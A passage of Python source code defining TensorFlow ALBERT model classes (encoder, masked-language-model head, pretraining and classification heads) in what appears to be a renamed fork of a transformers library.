return tuple(v for v in [hidden_states, layer_hidden_states, layer_attentions] if v is not None)
class TFAlbertTransformer(tf.keras.layers.Layer):
def __init__(self, config: AlbertConfig, **kwargs):
super().__init__(**kwargs)
self.num_hidden_layers = config.num_hidden_layers
self.num_hidden_groups = config.num_hidden_groups
# Number of layers in a hidden group
self.layers_per_group = int(config.num_hidden_layers / config.num_hidden_groups)
self.embedding_hidden_mapping_in = tf.keras.layers.Dense(
units=config.hidden_size,
kernel_initializer=get_initializer(config.initializer_range),
name="embedding_hidden_mapping_in",
)
self.albert_layer_groups = [
TFAlbertLayerGroup(config, name="albert_layer_groups_._{}".format(i))
for i in range(config.num_hidden_groups)
]
def call(
self,
hidden_states: tf.Tensor,
attention_mask: tf.Tensor,
head_mask: tf.Tensor,
output_attentions: bool,
output_hidden_states: bool,
return_dict: bool,
training: bool = False,
) -> Union[TFBaseModelOutput, Tuple[tf.Tensor]]:
hidden_states = self.embedding_hidden_mapping_in(inputs=hidden_states)
all_attentions = () if output_attentions else None
all_hidden_states = (hidden_states,) if output_hidden_states else None
for i in range(self.num_hidden_layers):
# Index of the hidden group
group_idx = int(i / (self.num_hidden_layers / self.num_hidden_groups))
layer_group_output = self.albert_layer_groups[group_idx](
hidden_states=hidden_states,
attention_mask=attention_mask,
head_mask=head_mask[group_idx * self.layers_per_group : (group_idx + 1) * self.layers_per_group],
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
training=training,
)
hidden_states = layer_group_output[0]
if output_attentions:
all_attentions = all_attentions + layer_group_output[-1]
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(v for v in [hidden_states, all_hidden_states, all_attentions] if v is not None)
return TFBaseModelOutput(
last_hidden_state=hidden_states, hidden_states=all_hidden_states, attentions=all_attentions
)
class TFAlbertPreTrainedModel(TFPreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = AlbertConfig
base_model_prefix = "albert"
class TFAlbertMLMHead(tf.keras.layers.Layer):
def __init__(self, config: AlbertConfig, input_embeddings: tf.keras.layers.Layer, **kwargs):
super().__init__(**kwargs)
self.vocab_size = config.vocab_size
self.embedding_size = config.embedding_size
self.dense = tf.keras.layers.Dense(
config.embedding_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
)
if isinstance(config.hidden_act, str):
self.activation = get_tf_activation(config.hidden_act)
else:
self.activation = config.hidden_act
self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
self.decoder = input_embeddings
def build(self, input_shape: tf.TensorShape):
self.bias = self.add_weight(shape=(self.vocab_size,), initializer="zeros", trainable=True, name="bias")
self.decoder_bias = self.add_weight(
shape=(self.vocab_size,), initializer="zeros", trainable=True, name="decoder/bias"
)
super().build(input_shape)
def get_output_embeddings(self) -> tf.keras.layers.Layer:
return self.decoder
def set_output_embeddings(self, value: tf.Variable):
self.decoder.weight = value
self.decoder.vocab_size = shape_list(value)[0]
def get_bias(self) -> Dict[str, tf.Variable]:
return {"bias": self.bias, "decoder_bias": self.decoder_bias}
def set_bias(self, value: tf.Variable):
self.bias = value["bias"]
self.decoder_bias = value["decoder_bias"]
self.vocab_size = shape_list(value["bias"])[0]
def call(self, hidden_states: tf.Tensor) -> tf.Tensor:
hidden_states = self.dense(inputs=hidden_states)
hidden_states = self.activation(hidden_states)
hidden_states = self.LayerNorm(inputs=hidden_states)
seq_length = shape_list(tensor=hidden_states)[1]
hidden_states = tf.reshape(tensor=hidden_states, shape=[-1, self.embedding_size])
hidden_states = tf.matmul(a=hidden_states, b=self.decoder.weight, transpose_b=True)
hidden_states = tf.reshape(tensor=hidden_states, shape=[-1, seq_length, self.vocab_size])
hidden_states = tf.nn.bias_add(value=hidden_states, bias=self.decoder_bias)
return hidden_states
@keras_serializable
class TFAlbertMainLayer(tf.keras.layers.Layer):
config_class = AlbertConfig
def __init__(self, config: AlbertConfig, add_pooling_layer: bool = True, **kwargs):
super().__init__(**kwargs)
self.config = config
self.embeddings = TFAlbertEmbeddings(config, name="embeddings")
self.encoder = TFAlbertTransformer(config, name="encoder")
self.pooler = (
tf.keras.layers.Dense(
units=config.hidden_size,
kernel_initializer=get_initializer(config.initializer_range),
activation="tanh",
name="pooler",
)
if add_pooling_layer
else None
)
def get_input_embeddings(self) -> tf.keras.layers.Layer:
return self.embeddings
def set_input_embeddings(self, value: tf.Variable):
self.embeddings.weight = value
self.embeddings.vocab_size = shape_list(value)[0]
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
raise NotImplementedError
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: bool = False,
**kwargs,
) -> Union[TFBaseModelOutputWithPooling, Tuple[tf.Tensor]]:
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
kwargs_call=kwargs,
)
if inputs["input_ids"] is not None and inputs["inputs_embeds"] is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif inputs["input_ids"] is not None:
input_shape = shape_list(inputs["input_ids"])
elif inputs["inputs_embeds"] is not None:
input_shape = shape_list(inputs["inputs_embeds"])[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
if inputs["attention_mask"] is None:
inputs["attention_mask"] = tf.fill(dims=input_shape, value=1)
if inputs["token_type_ids"] is None:
inputs["token_type_ids"] = tf.fill(dims=input_shape, value=0)
embedding_output = self.embeddings(
input_ids=inputs["input_ids"],
position_ids=inputs["position_ids"],
token_type_ids=inputs["token_type_ids"],
inputs_embeds=inputs["inputs_embeds"],
training=inputs["training"],
)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
extended_attention_mask = tf.reshape(inputs["attention_mask"], (input_shape[0], 1, 1, input_shape[1]))
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
extended_attention_mask = tf.cast(extended_attention_mask, dtype=embedding_output.dtype)
one_cst = tf.constant(1.0, dtype=embedding_output.dtype)
ten_thousand_cst = tf.constant(-10000.0, dtype=embedding_output.dtype)
extended_attention_mask = tf.multiply(tf.subtract(one_cst, extended_attention_mask), ten_thousand_cst)
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
if inputs["head_mask"] is not None:
raise NotImplementedError
else:
inputs["head_mask"] = [None] * self.config.num_hidden_layers
encoder_outputs = self.encoder(
hidden_states=embedding_output,
attention_mask=extended_attention_mask,
head_mask=inputs["head_mask"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
sequence_output = encoder_outputs[0]
pooled_output = self.pooler(inputs=sequence_output[:, 0]) if self.pooler is not None else None
if not inputs["return_dict"]:
return (
sequence_output,
pooled_output,
) + encoder_outputs[1:]
return TFBaseModelOutputWithPooling(
last_hidden_state=sequence_output,
pooler_output=pooled_output,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
)
@dataclass
class TFAlbertForPreTrainingOutput(ModelOutput):
"""
Output type of :class:`~adj_tf.TFAlbertForPreTraining`.
Args:
prediction_logits (:obj:`tf.Tensor` of shape :obj:`(batch_size, sequence_length, config.vocab_size)`):
Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
sop_logits (:obj:`tf.Tensor` of shape :obj:`(batch_size, 2)`):
Prediction scores of the next sequence prediction (classification) head (scores of True/False continuation
before SoftMax).
hidden_states (:obj:`tuple(tf.Tensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of
shape :obj:`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (:obj:`tuple(tf.Tensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`tf.Tensor` (one for each layer) of shape :obj:`(batch_size, num_heads, sequence_length,
sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
"""
loss: tf.Tensor = None
prediction_logits: tf.Tensor = None
sop_logits: tf.Tensor = None
hidden_states: Optional[Tuple[tf.Tensor]] = None
attentions: Optional[Tuple[tf.Tensor]] = None
ALBERT_START_DOCSTRING = r"""
This model inherits from :class:`~adj_tf.TFPreTrainedModel`. Check the superclass documentation for the
generic methods the library implements for all its model (such as downloading or saving, resizing the input
embeddings, pruning heads etc.)
This model is also a `tf.keras.Model <https://www.tensorflow.org/api_docs/python/tf/keras/Model>`__ subclass. Use
it as a regular TF 2.0 Keras Model and refer to the TF 2.0 documentation for all matter related to general usage
and behavior.
.. note::
TF 2.0 models accepts two formats as inputs:
- having all inputs as keyword arguments (like PyTorch models), or
- having all inputs as a list, tuple or dict in the first positional arguments.
This second option is useful when using :meth:`tf.keras.Model.fit` method which currently requires having all
the tensors in the first argument of the model call function: :obj:`model(inputs)`.
If you choose this second option, there are three possibilities you can use to gather all the input Tensors in
the first positional argument :
- a single Tensor with :obj:`input_ids` only and nothing else: :obj:`model(inputs_ids)`
- a list of varying length with one or several input Tensors IN THE ORDER given in the docstring:
:obj:`model([input_ids, attention_mask])` or :obj:`model([input_ids, attention_mask, token_type_ids])`
- a dictionary with one or several input Tensors associated to the input names given in the docstring:
:obj:`model({"input_ids": input_ids, "token_type_ids": token_type_ids})`
Args:
config (:class:`~adj_tf.AlbertConfig`): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the :meth:`~adj_tf.PreTrainedModel.from_pretrained` method to load the model
weights.
"""
ALBERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`Numpy array` or :obj:`tf.Tensor` of shape :obj:`({0})`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using :class:`~adj_tf.AlbertTokenizer`. See
:func:`adj_tf.PreTrainedTokenizer.__call__` and :func:`adj_tf.PreTrainedTokenizer.encode` for
details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`Numpy array` or :obj:`tf.Tensor` of shape :obj:`({0})`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
token_type_ids (:obj:`Numpy array` or :obj:`tf.Tensor` of shape :obj:`({0})`, `optional`):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in ``[0,
1]``:
- 0 corresponds to a `sentence A` token,
- 1 corresponds to a `sentence B` token.
`What are token type IDs? <../glossary.html#token-type-ids>`_
position_ids (:obj:`Numpy array` or :obj:`tf.Tensor` of shape :obj:`({0})`, `optional`):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0,
config.max_position_embeddings - 1]``.
`What are position IDs? <../glossary.html#position-ids>`_
head_mask (:obj:`Numpy array` or :obj:`tf.Tensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`):
Mask to nullify selected heads of the self-attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (:obj:`tf.Tensor` of shape :obj:`({0}, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert :obj:`input_ids` indices into associated
vectors than the model's internal embedding lookup matrix.
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under returned
tensors for more detail. This argument can be used only in eager mode, in graph mode the value in the
config will be used instead.
output_hidden_states (:obj:`bool`, `optional`):
Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors for
more detail. This argument can be used only in eager mode, in graph mode the value in the config will be
used instead.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~adj_tf.file_utils.ModelOutput` instead of a plain tuple. This
argument can be used in eager mode, in graph mode the value will always be set to True.
training (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to use the model in training mode (some modules like dropout modules have different
behaviors between training and evaluation).
"""
@add_start_docstrings(
"The bare Albert Model transformer outputting raw hidden-states without any specific head on top.",
ALBERT_START_DOCSTRING,
)
class TFAlbertModel(TFAlbertPreTrainedModel):
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.albert = TFAlbertMainLayer(config, name="albert")
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="albert-base-v2",
output_type=TFBaseModelOutputWithPooling,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFBaseModelOutputWithPooling, Tuple[tf.Tensor]]:
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
kwargs_call=kwargs,
)
outputs = self.albert(
input_ids=inputs["input_ids"],
attention_mask=inputs["attention_mask"],
token_type_ids=inputs["token_type_ids"],
position_ids=inputs["position_ids"],
head_mask=inputs["head_mask"],
inputs_embeds=inputs["inputs_embeds"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
return outputs
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertModel.serving_output
def serving_output(self, output: TFBaseModelOutputWithPooling) -> TFBaseModelOutputWithPooling:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFBaseModelOutputWithPooling(
last_hidden_state=output.last_hidden_state,
pooler_output=output.pooler_output,
hidden_states=hs,
attentions=attns,
)
@add_start_docstrings(
"""
Albert Model with two heads on top for pretraining: a `masked language modeling` head and a `sentence order
prediction` (classification) head.
""",
ALBERT_START_DOCSTRING,
)
class TFAlbertForPreTraining(TFAlbertPreTrainedModel, TFAlbertPreTrainingLoss):
# names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"predictions.decoder.weight"]
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.num_labels = config.num_labels
self.albert = TFAlbertMainLayer(config, name="albert")
self.predictions = TFAlbertMLMHead(config, input_embeddings=self.albert.embeddings, name="predictions")
self.sop_classifier = TFAlbertSOPHead(config, name="sop_classifier")
def get_lm_head(self) -> tf.keras.layers.Layer:
return self.predictions
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@replace_return_docstrings(output_type=TFAlbertForPreTrainingOutput, config_class=_CONFIG_FOR_DOC)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
sentence_order_label: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFAlbertForPreTrainingOutput, Tuple[tf.Tensor]]:
r"""
Return:
Example::
>>> import tensorflow as tf
>>> from adj_tf import AlbertTokenizer, TFAlbertForPreTraining
>>> tokenizer = AlbertTokenizer.from_pretrained('albert-base-v2')
>>> model = TFAlbertForPreTraining.from_pretrained('albert-base-v2')
>>> input_ids = tf.constant(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True))[None, :] # Batch size 1
>>> outputs = model(input_ids)
>>> prediction_logits = outputs.prediction_logits
>>> sop_logits = outputs.sop_logits
"""
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
labels=labels,
sentence_order_label=sentence_order_label,
training=training,
kwargs_call=kwargs,
)
outputs = self.albert(
input_ids=inputs["input_ids"],
attention_mask=inputs["attention_mask"],
token_type_ids=inputs["token_type_ids"],
position_ids=inputs["position_ids"],
head_mask=inputs["head_mask"],
inputs_embeds=inputs["inputs_embeds"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
sequence_output, pooled_output = outputs[:2]
prediction_scores = self.predictions(hidden_states=sequence_output)
sop_scores = self.sop_classifier(pooled_output=pooled_output, training=inputs["training"])
total_loss = None
if inputs["labels"] is not None and inputs["sentence_order_label"] is not None:
d_labels = {"labels": inputs["labels"]}
d_labels["sentence_order_label"] = inputs["sentence_order_label"]
total_loss = self.compute_loss(labels=d_labels, logits=(prediction_scores, sop_scores))
if not inputs["return_dict"]:
output = (prediction_scores, sop_scores) + outputs[2:]
return ((total_loss,) + output) if total_loss is not None else output
return TFAlbertForPreTrainingOutput(
loss=total_loss,
prediction_logits=prediction_scores,
sop_logits=sop_scores,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
def serving_output(self, output: TFAlbertForPreTrainingOutput) -> TFAlbertForPreTrainingOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFAlbertForPreTrainingOutput(
prediction_logits=output.prediction_logits,
sop_logits=output.sop_logits,
hidden_states=hs,
attentions=attns,
)
class TFAlbertSOPHead(tf.keras.layers.Layer):
def __init__(self, config: AlbertConfig, **kwargs):
super().__init__(**kwargs)
self.dropout = tf.keras.layers.Dropout(rate=config.classifier_dropout_prob)
self.classifier = tf.keras.layers.Dense(
units=config.num_labels,
kernel_initializer=get_initializer(config.initializer_range),
name="classifier",
)
def call(self, pooled_output: tf.Tensor, training: bool) -> tf.Tensor:
dropout_pooled_output = self.dropout(inputs=pooled_output, training=training)
logits = self.classifier(inputs=dropout_pooled_output)
return logits
@add_start_docstrings("""Albert Model with a `language modeling` head on top. """, ALBERT_START_DOCSTRING)
class TFAlbertForMaskedLM(TFAlbertPreTrainedModel, TFMaskedLanguageModelingLoss):
# names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"pooler", r"predictions.decoder.weight"]
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.albert = TFAlbertMainLayer(config, add_pooling_layer=False, name="albert")
self.predictions = TFAlbertMLMHead(config, input_embeddings=self.albert.embeddings, name="predictions")
def get_lm_head(self) -> tf.keras.layers.Layer:
return self.predictions
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="albert-base-v2",
output_type=TFMaskedLMOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFMaskedLMOutput, Tuple[tf.Tensor]]:
r"""
labels (:obj:`tf.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ...,
config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored
(masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]``
"""
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
labels=labels,
training=training,
kwargs_call=kwargs,
)
outputs = self.albert(
input_ids=inputs["input_ids"],
attention_mask=inputs["attention_mask"],
token_type_ids=inputs["token_type_ids"],
position_ids=inputs["position_ids"],
head_mask=inputs["head_mask"],
inputs_embeds=inputs["inputs_embeds"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
sequence_output = outputs[0]
prediction_scores = self.predictions(hidden_states=sequence_output, training=inputs["training"])
loss = (
None if inputs["labels"] is None else self.compute_loss(labels=inputs["labels"], logits=prediction_scores)
)
if not inputs["return_dict"]:
output = (prediction_scores,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFMaskedLMOutput(
loss=loss,
logits=prediction_scores,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertForMaskedLM.serving_output
def serving_output(self, output: TFMaskedLMOutput) -> TFMaskedLMOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFMaskedLMOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
"""
Albert Model transformer with a sequence classification/regression head on top (a linear layer on top of the pooled
output) e.g. for GLUE tasks.
""",
ALBERT_START_DOCSTRING,
)
class TFAlbertForSequenceClassification(TFAlbertPreTrainedModel, TFSequenceClassificationLoss):
# names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"predictions"]
_keys_to_ignore_on_load_missing = [r"dropout"]
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.num_labels = config.num_labels
self.albert = TFAlbertMainLayer(config, name="albert")
self.dropout = tf.keras.layers.Dropout(rate=config.classifier_dropout_prob)
self.classifier = tf.keras.layers.Dense(
units=config.num_labels, kernel_initializer=get_initializer(config.initializer_range), name="classifier"
)
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="albert-base-v2",
output_type=TFSequenceClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFSequenceClassifierOutput, Tuple[tf.Tensor]]:
r"""
labels (:obj:`tf.Tensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the sequence classification/regression loss. Indices should be in ``[0, ...,
config.num_labels - 1]``. If ``config.num_labels == 1`` a regression loss is computed (Mean-Square loss),
If ``config.num_labels > 1`` a classification loss is computed (Cross-Entropy).
"""
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
labels=labels,
training=training,
kwargs_call=kwargs,
)
outputs = self.albert(
input_ids=inputs["input_ids"],
attention_mask=inputs["attention_mask"],
token_type_ids=inputs["token_type_ids"],
position_ids=inputs["position_ids"],
head_mask=inputs["head_mask"],
inputs_embeds=inputs["inputs_embeds"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
pooled_output = outputs[1]
pooled_output = self.dropout(inputs=pooled_output, training=inputs["training"])
logits = self.classifier(inputs=pooled_output)
loss = None if inputs["labels"] is None else self.compute_loss(labels=inputs["labels"], logits=logits)
if not inputs["return_dict"]:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFSequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertForSequenceClassification.serving_output
def serving_output(self, output: TFSequenceClassifierOutput) -> TFSequenceClassifierOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFSequenceClassifierOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
"""
Albert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for
Named-Entity-Recognition (NER) tasks.
""",
ALBERT_START_DOCSTRING,
)
class TFAlbertForTokenClassification(TFAlbertPreTrainedModel, TFTokenClassificationLoss):
# names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"pooler", r"predictions"]
_keys_to_ignore_on_load_missing = [r"dropout"]
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.num_labels = config.num_labels
self.albert = TFAlbertMainLayer(config, add_pooling_layer=False, name="albert")
self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
self.classifier = tf.keras.layers.Dense(
units=config.num_labels, kernel_initializer=get_initializer(config.initializer_range), name="classifier"
)
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="albert-base-v2",
output_type=TFTokenClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFTokenClassifierOutput, Tuple[tf.Tensor]]:
r"""
labels (:obj:`tf.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the token classification loss. Indices should be in ``[0, ..., config.num_labels -
1]``.
"""
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
labels=labels,
training=training,
kwargs_call=kwargs,
)
